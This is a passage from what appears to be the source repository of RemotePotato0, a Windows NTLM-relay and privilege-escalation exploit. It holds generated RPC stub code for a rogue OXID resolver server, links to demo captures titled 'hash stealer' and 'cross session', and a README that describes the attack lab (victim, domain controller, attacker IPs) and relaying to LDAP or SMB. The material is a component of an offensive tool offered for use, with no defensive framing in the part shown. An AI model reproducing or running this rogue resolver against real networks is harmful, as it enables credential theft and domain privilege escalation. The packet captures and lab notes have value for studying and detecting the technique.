_NDR64_BIND_AND_NOTIFY_EXTENSION */ 1528 | 0x72, /* FC64_BIND_PRIMITIVE */ 1529 | (NDR64_UINT8) 0 /* 0x0 */, 1530 | 0 /* 0x0 */, /* Stack offset */ 1531 | (NDR64_UINT8) 0 /* 0x0 */, 1532 | (NDR64_UINT8) 0 /* 0x0 */ 1533 | }, 1534 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1535 | }, 1536 | { 1537 | /* pSetId */ /* parameter pSetId */ 1538 | &__midl_frag45, 1539 | { 1540 | /* pSetId */ 1541 | 0, 1542 | 0, 1543 | 0, 1544 | 1, 1545 | 1, 1546 | 0, 1547 | 1, 1548 | 0, 1549 | 1, 1550 | 0, 1551 | 0, 1552 | 0, 1553 | 0, 1554 | (NDR64_UINT16) 0 /* 0x0 */, 1555 | 0 1556 | }, /* [in], [out], Basetype, SimpleRef */ 1557 | (NDR64_UINT16) 0 /* 0x0 */, 1558 | 8 /* 0x8 */, /* Stack offset */ 1559 | }, 1560 | { 1561 | /* SequenceNum */ /* parameter SequenceNum */ 1562 | &__midl_frag49, 1563 | { 1564 | /* SequenceNum */ 1565 | 
0, 1566 | 0, 1567 | 0, 1568 | 1, 1569 | 0, 1570 | 0, 1571 | 1, 1572 | 1, 1573 | 0, 1574 | 0, 1575 | 0, 1576 | 0, 1577 | 0, 1578 | (NDR64_UINT16) 0 /* 0x0 */, 1579 | 0 1580 | }, /* [in], Basetype, ByValue */ 1581 | (NDR64_UINT16) 0 /* 0x0 */, 1582 | 16 /* 0x10 */, /* Stack offset */ 1583 | }, 1584 | { 1585 | /* cAddToSet */ /* parameter cAddToSet */ 1586 | &__midl_frag49, 1587 | { 1588 | /* cAddToSet */ 1589 | 0, 1590 | 0, 1591 | 0, 1592 | 1, 1593 | 0, 1594 | 0, 1595 | 1, 1596 | 1, 1597 | 0, 1598 | 0, 1599 | 0, 1600 | 0, 1601 | 0, 1602 | (NDR64_UINT16) 0 /* 0x0 */, 1603 | 0 1604 | }, /* [in], Basetype, ByValue */ 1605 | (NDR64_UINT16) 0 /* 0x0 */, 1606 | 24 /* 0x18 */, /* Stack offset */ 1607 | }, 1608 | { 1609 | /* cDelFromSet */ /* parameter cDelFromSet */ 1610 | &__midl_frag49, 1611 | { 1612 | /* cDelFromSet */ 1613 | 0, 1614 | 0, 1615 | 0, 1616 | 1, 1617 | 0, 1618 | 0, 1619 | 1, 1620 | 1, 1621 | 0, 1622 | 0, 1623 | 0, 1624 | 0, 1625 | 0, 1626 | (NDR64_UINT16) 0 /* 0x0 */, 1627 | 0 1628 | }, /* [in], Basetype, ByValue */ 1629 | (NDR64_UINT16) 0 /* 0x0 */, 1630 | 32 /* 0x20 */, /* Stack offset */ 1631 | }, 1632 | { 1633 | /* AddToSet */ /* parameter AddToSet */ 1634 | &__midl_frag30, 1635 | { 1636 | /* AddToSet */ 1637 | 1, 1638 | 1, 1639 | 0, 1640 | 1, 1641 | 0, 1642 | 0, 1643 | 0, 1644 | 0, 1645 | 0, 1646 | 0, 1647 | 0, 1648 | 0, 1649 | 0, 1650 | (NDR64_UINT16) 0 /* 0x0 */, 1651 | 0 1652 | }, /* MustSize, MustFree, [in] */ 1653 | (NDR64_UINT16) 0 /* 0x0 */, 1654 | 40 /* 0x28 */, /* Stack offset */ 1655 | }, 1656 | { 1657 | /* DelFromSet */ /* parameter DelFromSet */ 1658 | &__midl_frag34, 1659 | { 1660 | /* DelFromSet */ 1661 | 1, 1662 | 1, 1663 | 0, 1664 | 1, 1665 | 0, 1666 | 0, 1667 | 0, 1668 | 0, 1669 | 0, 1670 | 0, 1671 | 0, 1672 | 0, 1673 | 0, 1674 | (NDR64_UINT16) 0 /* 0x0 */, 1675 | 0 1676 | }, /* MustSize, MustFree, [in] */ 1677 | (NDR64_UINT16) 0 /* 0x0 */, 1678 | 48 /* 0x30 */, /* Stack offset */ 1679 | }, 1680 | { 1681 | /* pPingBackoffFactor */ /* 
parameter pPingBackoffFactor */ 1682 | &__midl_frag49, 1683 | { 1684 | /* pPingBackoffFactor */ 1685 | 0, 1686 | 0, 1687 | 0, 1688 | 0, 1689 | 1, 1690 | 0, 1691 | 1, 1692 | 0, 1693 | 1, 1694 | 0, 1695 | 0, 1696 | 0, 1697 | 0, 1698 | (NDR64_UINT16) 0 /* 0x0 */, 1699 | 1 1700 | }, /* [out], Basetype, SimpleRef, UseCache */ 1701 | (NDR64_UINT16) 0 /* 0x0 */, 1702 | 56 /* 0x38 */, /* Stack offset */ 1703 | }, 1704 | { 1705 | /* error_status_t */ /* parameter error_status_t */ 1706 | &__midl_frag64, 1707 | { 1708 | /* error_status_t */ 1709 | 0, 1710 | 0, 1711 | 0, 1712 | 0, 1713 | 1, 1714 | 1, 1715 | 1, 1716 | 1, 1717 | 0, 1718 | 0, 1719 | 0, 1720 | 0, 1721 | 0, 1722 | (NDR64_UINT16) 0 /* 0x0 */, 1723 | 0 1724 | }, /* [out], IsReturn, Basetype, ByValue */ 1725 | (NDR64_UINT16) 0 /* 0x0 */, 1726 | 64 /* 0x40 */, /* Stack offset */ 1727 | } 1728 | }; 1729 | 1730 | static const __midl_frag20_t __midl_frag20 = 1731 | { 1732 | /* SimplePing */ 1733 | { 1734 | /* SimplePing */ /* procedure SimplePing */ 1735 | (NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */ 1736 | (NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */ 1737 | (NDR64_UINT32) 40 /* 0x28 */, 1738 | (NDR64_UINT32) 8 /* 0x8 */, 1739 | (NDR64_UINT16) 1 /* 0x1 */, 1740 | (NDR64_UINT16) 0 /* 0x0 */, 1741 | (NDR64_UINT16) 2 /* 0x2 */, 1742 | (NDR64_UINT16) 8 /* 0x8 */ 1743 | }, 1744 | { 1745 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1746 | { 1747 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1748 | 0x72, /* FC64_BIND_PRIMITIVE */ 1749 | (NDR64_UINT8) 0 /* 0x0 */, 1750 | 0 /* 0x0 */, /* Stack offset */ 1751 | (NDR64_UINT8) 0 /* 0x0 */, 1752 | (NDR64_UINT8) 0 /* 0x0 */ 1753 | }, 1754 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1755 | }, 1756 | { 1757 | /* pSetId */ /* parameter pSetId */ 1758 | &__midl_frag45, 1759 | { 1760 | /* pSetId */ 1761 | 0, 1762 | 0, 1763 | 0, 1764 | 1, 1765 | 0, 1766 | 0, 1767 | 1, 1768 | 0, 1769 | 1, 1770 | 0, 1771 | 0, 1772 | 
0, 1773 | 0, 1774 | (NDR64_UINT16) 0 /* 0x0 */, 1775 | 0 1776 | }, /* [in], Basetype, SimpleRef */ 1777 | (NDR64_UINT16) 0 /* 0x0 */, 1778 | 8 /* 0x8 */, /* Stack offset */ 1779 | }, 1780 | { 1781 | /* error_status_t */ /* parameter error_status_t */ 1782 | &__midl_frag64, 1783 | { 1784 | /* error_status_t */ 1785 | 0, 1786 | 0, 1787 | 0, 1788 | 0, 1789 | 1, 1790 | 1, 1791 | 1, 1792 | 1, 1793 | 0, 1794 | 0, 1795 | 0, 1796 | 0, 1797 | 0, 1798 | (NDR64_UINT16) 0 /* 0x0 */, 1799 | 0 1800 | }, /* [out], IsReturn, Basetype, ByValue */ 1801 | (NDR64_UINT16) 0 /* 0x0 */, 1802 | 16 /* 0x10 */, /* Stack offset */ 1803 | } 1804 | }; 1805 | 1806 | static const __midl_frag16_t __midl_frag16 = 1807 | { 1808 | /* IID */ 1809 | { 1810 | /* IID */ 1811 | 0x30, /* FC64_STRUCT */ 1812 | (NDR64_UINT8) 3 /* 0x3 */, 1813 | { 1814 | /* IID */ 1815 | 0, 1816 | 0, 1817 | 0, 1818 | 0, 1819 | 0, 1820 | 0, 1821 | 0, 1822 | 0 1823 | }, 1824 | (NDR64_UINT8) 0 /* 0x0 */, 1825 | (NDR64_UINT32) 16 /* 0x10 */ 1826 | } 1827 | }; 1828 | 1829 | static const __midl_frag13_t __midl_frag13 = 1830 | { 1831 | /* */ 1832 | (NDR64_UINT32) 1 /* 0x1 */, 1833 | { 1834 | /* struct _NDR64_EXPR_VAR */ 1835 | 0x3, /* FC_EXPR_VAR */ 1836 | 0x3, /* FC64_UINT16 */ 1837 | (NDR64_UINT16) 0 /* 0x0 */, 1838 | (NDR64_UINT32) 0 /* 0x0 */ 1839 | } 1840 | }; 1841 | 1842 | static const __midl_frag12_t __midl_frag12 = 1843 | { 1844 | /* */ 1845 | { 1846 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1847 | 0x41, /* FC64_CONF_ARRAY */ 1848 | (NDR64_UINT8) 1 /* 0x1 */, 1849 | { 1850 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1851 | 0, 1852 | 0, 1853 | 0, 1854 | 0, 1855 | 0, 1856 | 0, 1857 | 0, 1858 | 0 1859 | }, 1860 | (NDR64_UINT8) 0 /* 0x0 */, 1861 | (NDR64_UINT32) 2 /* 0x2 */, 1862 | &__midl_frag13 1863 | }, 1864 | { 1865 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1866 | (NDR64_UINT32) 2 /* 0x2 */, 1867 | &__midl_frag49 1868 | } 1869 | }; 1870 | 1871 | static const __midl_frag11_t __midl_frag11 = 1872 | { 1873 | /* 
DUALSTRINGARRAY */ 1874 | { 1875 | /* DUALSTRINGARRAY */ 1876 | 0x32, /* FC64_CONF_STRUCT */ 1877 | (NDR64_UINT8) 1 /* 0x1 */, 1878 | { 1879 | /* DUALSTRINGARRAY */ 1880 | 0, 1881 | 0, 1882 | 1, 1883 | 0, 1884 | 0, 1885 | 0, 1886 | 0, 1887 | 0 1888 | }, 1889 | (NDR64_UINT8) 0 /* 0x0 */, 1890 | (NDR64_UINT32) 4 /* 0x4 */, 1891 | &__midl_frag12 1892 | } 1893 | }; 1894 | 1895 | static const __midl_frag2_t __midl_frag2 = 1896 | { 1897 | /* ResolveOxid */ 1898 | { 1899 | /* ResolveOxid */ /* procedure ResolveOxid */ 1900 | (NDR64_UINT32) 23986240 /* 0x16e0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize, HasReturn, ServerCorrelation, ClientCorrelation, HasExtensions */ 1901 | (NDR64_UINT32) 64 /* 0x40 */ , /* Stack size */ 1902 | (NDR64_UINT32) 46 /* 0x2e */, 1903 | (NDR64_UINT32) 112 /* 0x70 */, 1904 | (NDR64_UINT16) 1 /* 0x1 */, 1905 | (NDR64_UINT16) 0 /* 0x0 */, 1906 | (NDR64_UINT16) 7 /* 0x7 */, 1907 | (NDR64_UINT16) 8 /* 0x8 */ 1908 | }, 1909 | { 1910 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1911 | { 1912 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1913 | 0x72, /* FC64_BIND_PRIMITIVE */ 1914 | (NDR64_UINT8) 0 /* 0x0 */, 1915 | 0 /* 0x0 */, /* Stack offset */ 1916 | (NDR64_UINT8) 0 /* 0x0 */, 1917 | (NDR64_UINT8) 0 /* 0x0 */ 1918 | }, 1919 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1920 | }, 1921 | { 1922 | /* pOxid */ /* parameter pOxid */ 1923 | &__midl_frag45, 1924 | { 1925 | /* pOxid */ 1926 | 0, 1927 | 0, 1928 | 0, 1929 | 1, 1930 | 0, 1931 | 0, 1932 | 1, 1933 | 0, 1934 | 1, 1935 | 0, 1936 | 0, 1937 | 0, 1938 | 0, 1939 | (NDR64_UINT16) 0 /* 0x0 */, 1940 | 0 1941 | }, /* [in], Basetype, SimpleRef */ 1942 | (NDR64_UINT16) 0 /* 0x0 */, 1943 | 8 /* 0x8 */, /* Stack offset */ 1944 | }, 1945 | { 1946 | /* cRequestedProtseqs */ /* parameter cRequestedProtseqs */ 1947 | &__midl_frag49, 1948 | { 1949 | /* cRequestedProtseqs */ 1950 | 0, 1951 | 0, 1952 | 0, 1953 | 1, 1954 | 0, 1955 | 0, 1956 | 1, 1957 | 1, 1958 | 0, 1959 | 0, 
1960 | 0, 1961 | 0, 1962 | 0, 1963 | (NDR64_UINT16) 0 /* 0x0 */, 1964 | 0 1965 | }, /* [in], Basetype, ByValue */ 1966 | (NDR64_UINT16) 0 /* 0x0 */, 1967 | 16 /* 0x10 */, /* Stack offset */ 1968 | }, 1969 | { 1970 | /* arRequestedProtseqs */ /* parameter arRequestedProtseqs */ 1971 | &__midl_frag47, 1972 | { 1973 | /* arRequestedProtseqs */ 1974 | 1, 1975 | 1, 1976 | 0, 1977 | 1, 1978 | 0, 1979 | 0, 1980 | 0, 1981 | 0, 1982 | 0, 1983 | 0, 1984 | 0, 1985 | 0, 1986 | 0, 1987 | (NDR64_UINT16) 0 /* 0x0 */, 1988 | 0 1989 | }, /* MustSize, MustFree, [in] */ 1990 | (NDR64_UINT16) 0 /* 0x0 */, 1991 | 24 /* 0x18 */, /* Stack offset */ 1992 | }, 1993 | { 1994 | /* ppdsaOxidBindings */ /* parameter ppdsaOxidBindings */ 1995 | &__midl_frag60, 1996 | { 1997 | /* ppdsaOxidBindings */ 1998 | 1, 1999 | 1, 2000 | 0, 2001 | 0, 2002 | 1, 2003 | 0, 2004 | 0, 2005 | 0, 2006 | 0, 2007 | 0, 2008 | 0, 2009 | 0, 2010 | 0, 2011 | (NDR64_UINT16) 0 /* 0x0 */, 2012 | 1 2013 | }, /* MustSize, MustFree, [out], UseCache */ 2014 | (NDR64_UINT16) 0 /* 0x0 */, 2015 | 32 /* 0x20 */, /* Stack offset */ 2016 | }, 2017 | { 2018 | /* pipidRemUnknown */ /* parameter pipidRemUnknown */ 2019 | &__midl_frag16, 2020 | { 2021 | /* pipidRemUnknown */ 2022 | 0, 2023 | 1, 2024 | 0, 2025 | 0, 2026 | 1, 2027 | 0, 2028 | 0, 2029 | 0, 2030 | 1, 2031 | 0, 2032 | 0, 2033 | 0, 2034 | 0, 2035 | (NDR64_UINT16) 0 /* 0x0 */, 2036 | 1 2037 | }, /* MustFree, [out], SimpleRef, UseCache */ 2038 | (NDR64_UINT16) 0 /* 0x0 */, 2039 | 40 /* 0x28 */, /* Stack offset */ 2040 | }, 2041 | { 2042 | /* pAuthnHint */ /* parameter pAuthnHint */ 2043 | &__midl_frag63, 2044 | { 2045 | /* pAuthnHint */ 2046 | 0, 2047 | 0, 2048 | 0, 2049 | 0, 2050 | 1, 2051 | 0, 2052 | 1, 2053 | 0, 2054 | 1, 2055 | 0, 2056 | 0, 2057 | 0, 2058 | 0, 2059 | (NDR64_UINT16) 0 /* 0x0 */, 2060 | 1 2061 | }, /* [out], Basetype, SimpleRef, UseCache */ 2062 | (NDR64_UINT16) 0 /* 0x0 */, 2063 | 48 /* 0x30 */, /* Stack offset */ 2064 | }, 2065 | { 2066 | /* error_status_t 
*/ /* parameter error_status_t */ 2067 | &__midl_frag64, 2068 | { 2069 | /* error_status_t */ 2070 | 0, 2071 | 0, 2072 | 0, 2073 | 0, 2074 | 1, 2075 | 1, 2076 | 1, 2077 | 1, 2078 | 0, 2079 | 0, 2080 | 0, 2081 | 0, 2082 | 0, 2083 | (NDR64_UINT16) 0 /* 0x0 */, 2084 | 0 2085 | }, /* [out], IsReturn, Basetype, ByValue */ 2086 | (NDR64_UINT16) 0 /* 0x0 */, 2087 | 56 /* 0x38 */, /* Stack offset */ 2088 | } 2089 | }; 2090 | 2091 | static const __midl_frag1_t __midl_frag1 = 2092 | (NDR64_UINT32) 0 /* 0x0 */; 2093 | 2094 | 2095 | #include "poppack.h" 2096 | 2097 | 2098 | static const FormatInfoRef IObjectExporter_Ndr64ProcTable[] = 2099 | { 2100 | &__midl_frag2, 2101 | &__midl_frag20, 2102 | &__midl_frag24, 2103 | &__midl_frag41, 2104 | &__midl_frag43, 2105 | &__midl_frag58 2106 | }; 2107 | 2108 | 2109 | static const MIDL_STUB_DESC IObjectExporter_StubDesc = 2110 | { 2111 | (void *)& IObjectExporter___RpcServerInterface, 2112 | MIDL_user_allocate, 2113 | MIDL_user_free, 2114 | 0, 2115 | 0, 2116 | 0, 2117 | 0, 2118 | 0, 2119 | RogueOxidResolver__MIDL_TypeFormatString.Format, 2120 | 1, /* -error bounds_check flag */ 2121 | 0x60001, /* Ndr library version */ 2122 | 0, 2123 | 0x801026e, /* MIDL Version 8.1.622 */ 2124 | 0, 2125 | 0, 2126 | 0, /* notify & notify_flag routine table */ 2127 | 0x2000001, /* MIDL flag */ 2128 | 0, /* cs routines */ 2129 | (void *)& IObjectExporter_ServerInfo, /* proxy/server info */ 2130 | 0 2131 | }; 2132 | 2133 | static const RPC_DISPATCH_FUNCTION IObjectExporter_NDR64__table[] = 2134 | { 2135 | NdrServerCallAll, 2136 | NdrServerCallAll, 2137 | NdrServerCallAll, 2138 | NdrServerCallAll, 2139 | NdrServerCallAll, 2140 | NdrServerCallAll, 2141 | 0 2142 | }; 2143 | static const RPC_DISPATCH_TABLE IObjectExporter_NDR64__v0_0_DispatchTable = 2144 | { 2145 | 6, 2146 | (RPC_DISPATCH_FUNCTION*)IObjectExporter_NDR64__table 2147 | }; 2148 | 2149 | static const MIDL_SYNTAX_INFO IObjectExporter_SyntaxInfo [ 2 ] = 2150 | { 2151 | { 2152 | 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 2153 | (RPC_DISPATCH_TABLE*)&IObjectExporter_v0_0_DispatchTable, 2154 | RogueOxidResolver__MIDL_ProcFormatString.Format, 2155 | IObjectExporter_FormatStringOffsetTable, 2156 | RogueOxidResolver__MIDL_TypeFormatString.Format, 2157 | 0, 2158 | 0, 2159 | 0 2160 | } 2161 | ,{ 2162 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 2163 | (RPC_DISPATCH_TABLE*)&IObjectExporter_NDR64__v0_0_DispatchTable, 2164 | 0 , 2165 | (unsigned short *) IObjectExporter_Ndr64ProcTable, 2166 | 0, 2167 | 0, 2168 | 0, 2169 | 0 2170 | } 2171 | }; 2172 | 2173 | 2174 | static const SERVER_ROUTINE IObjectExporter_ServerRoutineTable[] = 2175 | { 2176 | (SERVER_ROUTINE)ResolveOxid, 2177 | (SERVER_ROUTINE)SimplePing, 2178 | (SERVER_ROUTINE)ComplexPing, 2179 | (SERVER_ROUTINE)ServerAlive, 2180 | (SERVER_ROUTINE)ResolveOxid2, 2181 | (SERVER_ROUTINE)ServerAlive2 2182 | }; 2183 | 2184 | static const MIDL_SERVER_INFO IObjectExporter_ServerInfo = 2185 | { 2186 | &IObjectExporter_StubDesc, 2187 | IObjectExporter_ServerRoutineTable, 2188 | RogueOxidResolver__MIDL_ProcFormatString.Format, 2189 | (unsigned short *) IObjectExporter_FormatStringOffsetTable, 2190 | 0, 2191 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 2192 | 2, 2193 | (MIDL_SYNTAX_INFO*)IObjectExporter_SyntaxInfo 2194 | }; 2195 | #if _MSC_VER >= 1200 2196 | #pragma warning(pop) 2197 | #endif 2198 | 2199 | 2200 | #endif /* defined(_M_AMD64)*/ 2201 | 2202 | -------------------------------------------------------------------------------- /demo_cross_session.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/demo_cross_session.gif -------------------------------------------------------------------------------- /demo_hash_stealer.gif: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/demo_hash_stealer.gif
--------------------------------------------------------------------------------
/network_capture_pcap/README.md:
--------------------------------------------------------------------------------
1 | ## Notes
2 |
3 | ### Scenario:
4 |
5 | - victim server: server1 (192.168.83.131)
6 | - domain controller: dc1 (192.168.83.135)
7 | - attacker: kali (192.168.83.130)
8 |
9 | Other notes:
10 |
11 | - the core of this exploit generates traffic on the victim server (victim_server.pcapng);
12 | - all the irrelevant traffic has been filtered out from the full capture using the following filter:
13 |   - `(dcerpc or http) and not rpc_netlogon and not tcp.port == 5985 and (ip.addr == 192.168.83.130 or ip.addr == 127.0.0.1)`
14 | - I have also added the capture from the domain controller (domain_controller.pcapng). Note that the LDAP traffic generated on the targeted domain controller is specific to the attack scenario we used. A different attack scenario could generate different traffic on the targeted machine, e.g. relay to SMB.
15 | -------------------------------------------------------------------------------- /network_capture_pcap/domain_controller.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/network_capture_pcap/domain_controller.pcapng -------------------------------------------------------------------------------- /network_capture_pcap/victim_server.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antonioCoco/RemotePotato0/e7ae9d4e382c17d3f9359988e4462f1aa19329e8/network_capture_pcap/victim_server.pcapng --------------------------------------------------------------------------------